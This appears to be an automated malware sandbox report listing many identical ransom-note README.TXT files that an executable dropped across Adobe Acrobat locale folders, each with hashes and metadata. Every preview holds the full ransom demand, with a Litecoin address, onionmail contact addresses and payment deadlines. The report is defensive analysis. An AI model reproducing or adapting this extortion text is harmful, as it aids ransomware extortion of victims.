                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\eu-es\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\fi-fi\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-fr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-ma\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\he-il\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\hr-hr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\hu-hu\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\it-it\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ja-jp\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ko-kr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\nb-no\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\nl-nl\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\pl-pl\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\pt-br\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ro-ro\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
